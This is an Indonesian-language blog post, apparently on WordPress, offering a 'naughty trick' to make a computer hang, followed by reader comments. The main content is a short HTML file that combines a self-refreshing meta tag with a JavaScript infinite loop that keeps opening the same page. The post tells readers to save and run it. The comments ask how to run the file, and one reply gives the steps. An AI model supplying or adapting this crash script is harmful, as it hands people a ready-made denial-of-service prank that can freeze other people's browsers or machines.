Trik Nakal Bikin Komputer Hank

Setelah beberapa saat googling wa Dapat Sebuah trik lagi .X nih wa comot dari tetangga sebelah moga ja tetangga sebelahnya g’ marah yaa ..

Ok Nih ada sdikit script yang bias ngebuat kompi kita menjadi crash alias hang .Nah scrip ini menggunakan code yang berfungsi untuk memanggil diri sendiri .Dengan script yang pendek ini kompi sobat bisa crash pengen bukti ??? yok mari kita coba ..

Copy code di bawah ini ..trus simpan dengan nama index.html trus jangan lupa ganti save as type nya menjadi all files .,Ok trus tinggal di jalanin aja deh ..

<HTML>

<HEAD>

<META HTTP-EQUIV=”Refresh” CONTENT=”1; URL=index.html”>

<SCRIPT LANGUAGE=”JavaScript”>

<!–

for (x=0;x<1;x)

open(“index.html”);

</SCRIPT>

</HEAD>

</body>

</HTML>

Ingat Memberilah Sebanyak-banyaknya Bukan menerima sebanyak-banyaknya …

4 thoughts on “Trik Nakal Bikin Komputer Hank

  1. ini di copy pastenya kemana yah…… notepad atau kemana …mohon petunjuknya saya sangat terobsesi utuk menjadi hacker handal karena yang seharusnya biaya internet sangatlah murah tetapi kita bangsa indonesia telah di bodoh2i oleh orang2 kaya…thx

  2. maksud kalimat ” tinggal jalanin ” di atas maksudnya ke’ mana?????????????????????

  3. copy paste coding diatas ke notepad, trus simpan dalam bentuk (.html). pada kotak save coba lirik kebawah dan pilih allfile.. jalankan file yang disimpan tadi dengan doubleklik..

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s